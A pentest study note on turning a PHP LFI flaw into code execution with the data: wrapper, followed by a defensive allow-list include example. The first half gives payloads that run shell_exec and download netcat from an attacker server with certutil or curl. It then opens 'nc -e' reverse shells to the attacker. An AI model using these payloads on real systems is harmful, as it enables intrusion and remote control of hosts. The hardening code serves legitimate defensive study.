The PHP data wrapper (data:) can be used to exploit Directory Traversal and LFI. It gives us additional flexibility when injecting PHP code through an LFI vulnerability, and provides an alternative payload when we cannot poison a local file with PHP code.
# We know this is vulnerable to LFI, so we use the data wrapper:
# LFI without manipulating any local file. shell_exec is added at the end to confirm code execution.
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("whoami")?>
Once we see the output of shell_exec, we have a web shell. The next step is always to transfer nc.exe (Windows) or the netcat binary and get a shell back on our terminal using the following approach:
1. Host a Python web server on our attacking Kali machine.
2. Download nc.exe onto the target through the same LFI:
   http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("certutil.exe -urlcache -f http://<Attacking IP>/nc.exe nc.exe")?>
3. Once nc.exe is transferred, issue the following command to get a shell back:
   nc.exe -e cmd.exe <Kali's IP> <port>
4. If the victim is a Kali machine, transfer the netcat binary instead (curl needs the output file name, then the URL):
   http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("curl -o nc http://<Attacking IP>/nc")?>
5. netcat -e /bin/bash <Kali's IP> <port>
# If one transfer method doesn't work, try the others.
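From the defending side, as an added example that is not part of the original note: the include pattern the data wrapper abuses, beside a hardened version that never hands the request string to include(). The PAGES allow-list and the pages/ paths are assumed names.

```php
<?php
// Added example (not from the original note): why menu.php?file=data:... works,
// and a hardened include that closes it.

// VULNERABLE: the request parameter goes straight into include(). With
// allow_url_include=On, PHP opens data:text/plain,<?php ...?> as a stream and
// executes the embedded code; no file on disk has to be written or poisoned.
function vulnerable_include(string $file): void {
    include $file;
}

// HARDENED: map the request onto a fixed allow-list of page names. Anything that
// is not an exact key (wrapper prefixes like data: or php://, ../ sequences,
// absolute paths) falls back to the default page, so include() only ever sees
// paths we wrote ourselves. Assumed layout: ./pages/*.php
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(?string $requested): string {
    if ($requested !== null && array_key_exists($requested, PAGES)) {
        return PAGES[$requested];
    }
    return PAGES['home'];
}

function hardened_include(?string $requested): void {
    include resolve_page($requested);
}

// Defence in depth: the data: payload depends on remote includes being enabled.
// Fail loudly at startup if php.ini still has allow_url_include turned on.
function assert_remote_include_disabled(): void {
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include must be Off');
    }
}

// Constructed inputs shaped like the payloads in this note: every one of them
// resolves to an allow-listed path, never to a wrapper.
foreach (['home', 'data:text/plain,<?php echo 1; ?>', '../../etc/passwd', null] as $in) {
    echo var_export($in, true), ' -> ', resolve_page($in), PHP_EOL;
}
```

Setting allow_url_include=Off in php.ini is the server-side control; the allow-list is what removes the LFI itself, since a traversal payload still works against include() when only the wrapper is blocked.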